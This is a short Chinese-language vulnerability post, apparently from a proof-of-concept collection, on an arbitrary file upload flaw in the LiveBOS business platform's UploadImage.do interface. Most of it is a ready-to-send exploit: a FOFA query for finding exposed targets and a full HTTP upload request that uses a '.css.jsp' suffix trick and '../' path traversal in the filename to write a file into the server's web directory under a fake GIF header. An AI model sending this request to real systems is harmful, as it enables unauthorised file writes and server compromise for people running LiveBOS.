LiveBOS灵动业务架构平台,是面向对象的业务支撑平台与建模工具。 在LiveBos的UploadImage.do接口中,发现了一处任意文件上传漏洞,攻击者可利用该漏洞上传任意文件。
fofaapp="LiveBOS-框架"pocPOST /feed/UploadImage.do;.css.jsp HTTP/1.1Host:Httpsendrequestex: trueUser-Agent: PostmanRuntime/7.29.0Accept: */*Postman-Token: 049266bd-e740-40bf-845f-bc511296894eAccept-Encoding: gzip, deflateCookie: zhzbsessionname=35FF312409BF3CAC561D5BC776643A05Content-Type: multipart/form-data;boundary=--------------------------WebKitFormBoundaryxegqoxxiContent-Length: 222---WebKitFormBoundaryxegqoxxiContent-Disposition:form-data;name="file";filename="../../../../../../././../../../../../java/fh/tomcat_fhxszsq/LiveBos/FormBuilder/feed/jsp/vtnifpvi.js"Content-Type: image/jpegGIF89a 123123123---WebKitFormBoundaryxegqoxxi--
首页 >
LiveBos UploadFile 任意文件上传漏洞附poc CN > POC/LiveBOS/灵动业务架构平台(LiveBOS)系统UploadImage.do接口文件上传漏洞(XVE